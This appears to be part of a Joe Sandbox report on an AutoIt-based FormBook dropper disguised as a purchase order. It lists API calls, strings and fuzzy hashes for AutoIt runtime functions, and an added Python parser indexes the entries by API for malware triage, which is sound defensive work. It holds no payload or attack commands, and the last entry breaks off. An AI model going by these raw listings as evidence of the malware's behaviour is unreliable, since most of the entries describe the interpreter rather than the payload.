                      • Opcode Fuzzy Hash: 18609db876b0038a9d3356e8a21f61a523fc842ac616cab19169fe16253c1927
                      • Instruction Fuzzy Hash: 3FF1027110430DAFE721DF65CA84BBABBE5FF493A4F044A29F688932A1C774D840DB91
                      APIs
                      • CharUpperBuffW.USER32(?,?,00B2DBF0), ref: 00AF6245
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                      • API String ID: 3964851224-45149045
                      • Opcode ID: ddaaaa5eff63e1347e6b5cf6936e6a9050491aa9ead72116c30d1a45d8d3ee4d
                      • Instruction ID: 18874fa0ea75c14db6a58331a9ef4dbb2d21705134f08d10051f12147d351720
                      • Opcode Fuzzy Hash: ddaaaa5eff63e1347e6b5cf6936e6a9050491aa9ead72116c30d1a45d8d3ee4d
                      • Instruction Fuzzy Hash: 28C191342042058FCB08EF94C651B7E77E6AF99394F04486CF9869B3D6CB24DD0ACB82
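The entries above are the Joe Sandbox IDA plugin's per-function dump: an API list with call-site addresses, a '$'-joined String ID, and opcode/instruction fuzzy hashes. The "AutoIt v3" window class, the "#include-once" / "#requireadmin" / "#notrayicon" / "#OnAutoItStartRegister" directives and the ControlCommand verbs (ADDSTRING, HIDEDROPDOWN, SETCURRENTSELECTION, ...) are strings of the AutoIt v3 interpreter, so the functions listed here are the AutoIt runtime compiled into the dropper, not the FormBook payload; for triage it is more useful to index such entries by API than to read them one by one. The following Python is an added example, not Joe Sandbox's or the plugin's code: it parses entries in this format into records and answers questions such as "which function combines CreateFileW, ReadFile and OleLoadPicture". SAMPLE is constructed from two entries on this page, with one "Part of subcall function" line borrowed from a third entry to exercise that marker; the format handling (bullet prefix, "ref:" address, subcall marker, '$'-joined String ID, "Instruction Fuzzy Hash" as the last field of an entry) is an assumption based only on the entries visible here.

```python
"""Parse Joe Sandbox IDA-plugin function entries into records and index them by API.

Added example for this report page, not Joe Sandbox code. SAMPLE is constructed from
entries on the page; the format handling is an assumption based only on those entries.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

BULLET = "\u2022"

# Constructed sample: two entries from the page plus one subcall line from a third entry.
SAMPLE = """APIs
• GetProcessHeap.KERNEL32(00AB6AE9,00B467D8,00000014), ref: 00ABA937
Memory Dump Source
• Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
Similarity
• API ID: HeapProcess
• String ID:
• Opcode ID: cf4aaa9ff2071ebacdb6ef3805598f9ceefcf21614f97d20890965d8d7f8e10f
• Instruction Fuzzy Hash: 0DB012F07032034BD7084B3CAC5429E39D45789202341807D7403C3560DF308420DF00
APIs
• DestroyWindow.USER32 ref: 00AEA7C5
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEA97F
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEA9E7
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAA1D
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAA4A
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00B1D9BC,00000000), ref: 00AEAA60
  • Part of subcall function 00AFD385: GetSysColor.USER32(00000012), ref: 00AFD3BE
Strings
Similarity
• API ID: Window$Global$CreateRect$File
• String ID: $AutoIt v3$DISPLAY$static
• Opcode ID: 5e403b6aa7440d71c0c3f794ec388c4c512adda640f42573a1be2c374f4e1ebb
• Instruction Fuzzy Hash: 6302AD71A00254EFDB14DFA9CD89EAE7BB9FF48310F148559F905AB2A1DB30AD41CB60
"""

# "Name.MODULE(args), ref: ADDR"; parentheses and the comma are absent for calls with no args.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+?): ?(?P<value>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                   # call-site address inside the dumped image
    parent: str | None = None  # set when the plugin lists the call under a subcall


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)  # Opcode ID, fuzzy hashes, ...

    def api_names(self) -> set[str]:
        return {c.name for c in self.apis}

    def entry(self) -> int | None:
        """Lowest direct call-site address: a cheap proxy for where the function lives."""
        direct = [c.ref for c in self.apis if c.parent is None]
        return min(direct) if direct else None


def parse_entries(text: str) -> list[FunctionRecord]:
    """One record per function; 'Instruction Fuzzy Hash' is assumed to end each entry."""
    records: list[FunctionRecord] = []
    cur = FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith(BULLET):  # section headers (APIs, Strings, ...) carry no data
            continue
        line = line[len(BULLET):].strip()
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] is not None else []
            cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), m["parent"]))
            continue
        kv = KV_RE.match(line)
        if not kv:
            continue
        key, value = kv["key"], kv["value"].strip()
        cur.meta[key] = value
        if key == "String ID":
            cur.strings = [s for s in value.split("$") if s]
        elif key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = FunctionRecord()
    return records


def index_by_api(records: list[FunctionRecord]) -> dict[str, list[FunctionRecord]]:
    """API name -> every record that calls it, directly or via a listed subcall."""
    idx: dict[str, list[FunctionRecord]] = {}
    for rec in records:
        for name in rec.api_names():
            idx.setdefault(name, []).append(rec)
    return idx


def find_functions_calling(records: list[FunctionRecord], *apis: str) -> list[FunctionRecord]:
    """Records whose API set contains every requested name (e.g. a file-to-picture loader)."""
    want = set(apis)
    return [r for r in records if want <= r.api_names()]


if __name__ == "__main__":
    recs = parse_entries(SAMPLE)
    for r in find_functions_calling(recs, "CreateFileW", "ReadFile", "OleLoadPicture"):
        print(f"{r.entry():08X}", sorted(r.api_names()), r.strings, r.meta["Opcode ID"][:12])
```

Run it against the text of a whole report to get one record per listed function; `index_by_api` then answers "which functions touch this API" and `find_functions_calling` finds API combinations worth opening in the dump, such as the CreateFileW/ReadFile/OleLoadPicture loader above. Because subcall lines are kept with their parent address, a match may come from a callee rather than the function itself; check `parent` before attributing a call.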
                      APIs
                      • GetSysColor.USER32(00000012), ref: 00AFD3BE
                      • SetTextColor.GDI32(?,?), ref: 00AFD3C2
                      • GetSysColorBrush.USER32(0000000F), ref: 00AFD3D8
                      • GetSysColor.USER32(0000000F), ref: 00AFD3E3
                      • CreateSolidBrush.GDI32(?), ref: 00AFD3E8
                      • GetSysColor.USER32(00000011), ref: 00AFD400
                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AFD40E
                      • SelectObject.GDI32(?,00000000), ref: 00AFD41F
                      • SetBkColor.GDI32(?,00000000), ref: 00AFD428
                      • SelectObject.GDI32(?,?), ref: 00AFD435
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00AFD454
                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AFD46B
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00AFD480
                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AFD4A8
                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00AFD4CF
                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00AFD4ED
                      • DrawFocusRect.USER32(?,?), ref: 00AFD4F8
                      • GetSysColor.USER32(00000011), ref: 00AFD506
                      • SetTextColor.GDI32(?,00000000), ref: 00AFD50E
                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00AFD522
                      • SelectObject.GDI32(?,00AFD0B5), ref: 00AFD539
                      • DeleteObject.GDI32(?), ref: 00AFD544
                      • SelectObject.GDI32(?,?), ref: 00AFD54A
                      • DeleteObject.GDI32(?), ref: 00AFD54F
                      • SetTextColor.GDI32(?,?), ref: 00AFD555
                      • SetBkColor.GDI32(?,?), ref: 00AFD55F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                      • String ID:
                      • API String ID: 1996641542-0
                      • Opcode ID: 98ced02d9b160f0cba48dd8bd228f6908032334c853de92e43d7a551ca18f8ed
                      • Instruction ID: 2e4238f9b1c9f3323ef2f57c0496be0d818a6ec8069aeee6ccba08ddb8c7bde7
                      • Opcode Fuzzy Hash: 98ced02d9b160f0cba48dd8bd228f6908032334c853de92e43d7a551ca18f8ed
                      • Instruction Fuzzy Hash: EF512C71900218BFDF119FA8DC48EEE7BBAFB48320F508515FA15AB2A1DB759A40DB50
                      APIs
                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00AFB5C0
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AFB5D1
                      • CharNextW.USER32(0000014E), ref: 00AFB600
                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00AFB641
                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00AFB657
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AFB668
                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00AFB685
                      • SetWindowTextW.USER32(?,0000014E), ref: 00AFB6D7
                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00AFB6ED
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AFB71E
                      • _memset.LIBCMT ref: 00AFB743
                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00AFB78C
                      • _memset.LIBCMT ref: 00AFB7EB
                      • SendMessageW.USER32 ref: 00AFB815
                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00AFB86D
                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00AFB91A
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00AFB93C
                      • GetMenuItemInfoW.USER32(?), ref: 00AFB986
                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AFB9B3
                      • DrawMenuBar.USER32(?), ref: 00AFB9C2
                      • SetWindowTextW.USER32(?,0000014E), ref: 00AFB9EA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                      • String ID: 0
                      • API String ID: 1073566785-4108050209
                      • Opcode ID: 96848614ac5805eaa6ef1102937c77c4c36cb7424b8ac3e5f0439b938bb620f2
                      • Instruction ID: 6f1dbce223095ecc4b3cc41a724b0eb16557edcd830eec1ece25cc651ad5c7d3
                      • Opcode Fuzzy Hash: 96848614ac5805eaa6ef1102937c77c4c36cb7424b8ac3e5f0439b938bb620f2
                      • Instruction Fuzzy Hash: 47E1597591021CAFDB219F94CC84EFE7BB8EF05750F108156FA1AAB291DB748A41DF60
                      APIs
                      • GetCursorPos.USER32(?), ref: 00AF7587
                      • GetDesktopWindow.USER32 ref: 00AF759C
                      • GetWindowRect.USER32(00000000), ref: 00AF75A3
                      • GetWindowLongW.USER32(?,000000F0), ref: 00AF7605
                      • DestroyWindow.USER32(?), ref: 00AF7631
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00AF765A
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AF7678
                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00AF769E
                      • SendMessageW.USER32(?,00000421,?,?), ref: 00AF76B3
                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00AF76C6
                      • IsWindowVisible.USER32(?), ref: 00AF76E6
                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00AF7701
                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00AF7715
                      • GetWindowRect.USER32(?,?), ref: 00AF772D
                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00AF7753
                      • GetMonitorInfoW.USER32 ref: 00AF776D
                      • CopyRect.USER32(?,?), ref: 00AF7784
                      • SendMessageW.USER32(?,00000412,00000000), ref: 00AF77EF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                      • String ID: ($0$tooltips_class32
                      • API String ID: 698492251-4156429822
                      • Opcode ID: 599ea2951b7467b858a2f396b996d2aeedde757869a4ed4ebfc65df6b30689a8
                      • Instruction ID: 338c868e363683a9b6e28cd182664d6c3b323f0139293074de7f12493032396b
                      • Opcode Fuzzy Hash: 599ea2951b7467b858a2f396b996d2aeedde757869a4ed4ebfc65df6b30689a8
                      • Instruction Fuzzy Hash: 96B16B71608345AFDB44DFA8C948B6EBBE5FF88310F00891DF6999B291DB74E805CB91
                      APIs
                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00AD76ED
                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00AD7713
                      • _wcscpy.LIBCMT ref: 00AD7741
                      • _wcscmp.LIBCMT ref: 00AD774C
                      • _wcscat.LIBCMT ref: 00AD7762
                      • _wcsstr.LIBCMT ref: 00AD776D
                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00AD7789
                      • _wcscat.LIBCMT ref: 00AD77D2
                      • _wcscat.LIBCMT ref: 00AD77D9
                      • _wcsncpy.LIBCMT ref: 00AD7804
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                      • API String ID: 699586101-1459072770
                      • Opcode ID: e8188af0286b4edc826aa94ebcffb3fe58e570f09551f66e165aba1032a3f8c0
                      • Instruction ID: c1ae0c8fe00f94410c354f565a7dc03c1429377885b31d652f39c0fd4fbef962
                      • Opcode Fuzzy Hash: e8188af0286b4edc826aa94ebcffb3fe58e570f09551f66e165aba1032a3f8c0
                      • Instruction Fuzzy Hash: 40410172A04200BAEB05A7749D47EFF7BECEF15720F44049AF805E3193FB649A40A7A1
                      APIs
                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AAA839
                      • GetSystemMetrics.USER32(00000007), ref: 00AAA841
                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AAA86C
                      • GetSystemMetrics.USER32(00000008), ref: 00AAA874
                      • GetSystemMetrics.USER32(00000004), ref: 00AAA899
                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AAA8B6
                      • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00AAA8C6
                      • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AAA8F9
                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AAA90D
                      • GetClientRect.USER32(00000000,000000FF), ref: 00AAA92B
                      • GetStockObject.GDI32(00000011), ref: 00AAA947
                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAA952
                        • Part of subcall function 00AAB736: GetCursorPos.USER32(000000FF), ref: 00AAB749
                        • Part of subcall function 00AAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00AAB766
                        • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000001), ref: 00AAB78B
                        • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000002), ref: 00AAB799
                      • SetTimer.USER32(00000000,00000000,00000028,00AAACEE), ref: 00AAA979
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                      • String ID: AutoIt v3 GUI
                      • API String ID: 1458621304-248962490
                      • Opcode ID: 493fc18df910c8f6a6df2dad0b65732bdfa7168df14100cb1dae03355a6d4fa4
                      • Instruction ID: 89489342781c269393175b33b23d0c50d1abc7b77f890270bb8df0bccaec8e8a
                      • Opcode Fuzzy Hash: 493fc18df910c8f6a6df2dad0b65732bdfa7168df14100cb1dae03355a6d4fa4
                      • Instruction Fuzzy Hash: 1EB15731A0020AAFDB24DFA8CD85BAE7BF5FB18315F108669FA15A72D0DB74D801CB51
                      APIs
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF3626
                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B2DBF0,00000000,?,00000000,?,?), ref: 00AF3694
                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00AF36DC
                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00AF3765
                      • RegCloseKey.ADVAPI32(?), ref: 00AF3A85
                      • RegCloseKey.ADVAPI32(00000000), ref: 00AF3A92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Close$ConnectCreateRegistryValue
                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                      • API String ID: 536824911-966354055
                      • Opcode ID: 17db6df05b040310f76953627fc106c1fce13c228406e8046542729947fdca36
                      • Instruction ID: 2f6274cb70e81f48cf5cd6fcdace61ae6e64704d4e7403eb4f4ecee6f2010824
                      • Opcode Fuzzy Hash: 17db6df05b040310f76953627fc106c1fce13c228406e8046542729947fdca36
                      • Instruction Fuzzy Hash: B4027C756006019FCB14EF69CA95E2AB7E4FF89320F05845DF98A9B362DB34ED41CB81
                      APIs
                      • CharUpperBuffW.USER32(?,?), ref: 00AF6A52
                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00AF6B12
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BuffCharMessageSendUpper
                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                      • API String ID: 3974292440-719923060
                      • Opcode ID: 4fbc1a87683e9c2325fb907d558555dcdc32a6586e5b078af4a400c6b50ff0cd
                      • Instruction ID: 8b413cd7f9af3604f0bc08d20df0f38349cc4f83262a0afcbb975d78259395cf
                      • Opcode Fuzzy Hash: 4fbc1a87683e9c2325fb907d558555dcdc32a6586e5b078af4a400c6b50ff0cd
                      • Instruction Fuzzy Hash: A1A18E302046059FCB08EF64CA51B7AB3E5FF85364F148969F9A69B2D2DB34ED06CB41
                      APIs
                      • GetClassNameW.USER32(?,?,00000100), ref: 00ACDD87
                      • __swprintf.LIBCMT ref: 00ACDE28
                      • _wcscmp.LIBCMT ref: 00ACDE3B
                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00ACDE90
                      • _wcscmp.LIBCMT ref: 00ACDECC
                      • GetClassNameW.USER32(?,?,00000400), ref: 00ACDF03
                      • GetDlgCtrlID.USER32(?), ref: 00ACDF55
                      • GetWindowRect.USER32(?,?), ref: 00ACDF8B
                      • GetParent.USER32(?), ref: 00ACDFA9
                      • ScreenToClient.USER32(00000000), ref: 00ACDFB0
                      • GetClassNameW.USER32(?,?,00000100), ref: 00ACE02A
                      • _wcscmp.LIBCMT ref: 00ACE03E
                      • GetWindowTextW.USER32(?,?,00000400), ref: 00ACE064
                      • _wcscmp.LIBCMT ref: 00ACE078
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                      • String ID: %s%u
                      • API String ID: 3119225716-679674701
                      • Opcode ID: f05824faebbe2f50181d47a611295da0b0a4279aad61be5d243d5ea324f787f9
                      • Instruction ID: f9a70d6f8a49b6720a8667fe9d51fc8a99eb9151afddc29d1ed9aa620bca9924
                      • Opcode Fuzzy Hash: f05824faebbe2f50181d47a611295da0b0a4279aad61be5d243d5ea324f787f9
                      • Instruction Fuzzy Hash: 90A19A71204706ABD715DF64C884FEAB7E8FF44350F01862EF9AAD6191EB30A945CBD1
                      APIs
                      • GetClassNameW.USER32(00000008,?,00000400), ref: 00ACE6E1
                      • _wcscmp.LIBCMT ref: 00ACE6F2
                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 00ACE71A
                      • CharUpperBuffW.USER32(?,00000000), ref: 00ACE737
                      • _wcscmp.LIBCMT ref: 00ACE755
                      • _wcsstr.LIBCMT ref: 00ACE766
                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00ACE79E
                      • _wcscmp.LIBCMT ref: 00ACE7AE
                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 00ACE7D5
                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00ACE81E
                      • _wcscmp.LIBCMT ref: 00ACE82E
                      • GetClassNameW.USER32(00000010,?,00000400), ref: 00ACE856
                      • GetWindowRect.USER32(00000004,?), ref: 00ACE8BF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                      • String ID: @$ThumbnailClass
                      • API String ID: 1788623398-1539354611
                      • Opcode ID: 24d4f8c233c9020b1ec189b95b3f4a4bbee2191ec14d70fe1029866075253d7d
                      • Instruction ID: 66435ec029360c130459caa74fb82ca8fe20fb57ff7fbbbc8b10859b6f14cb23
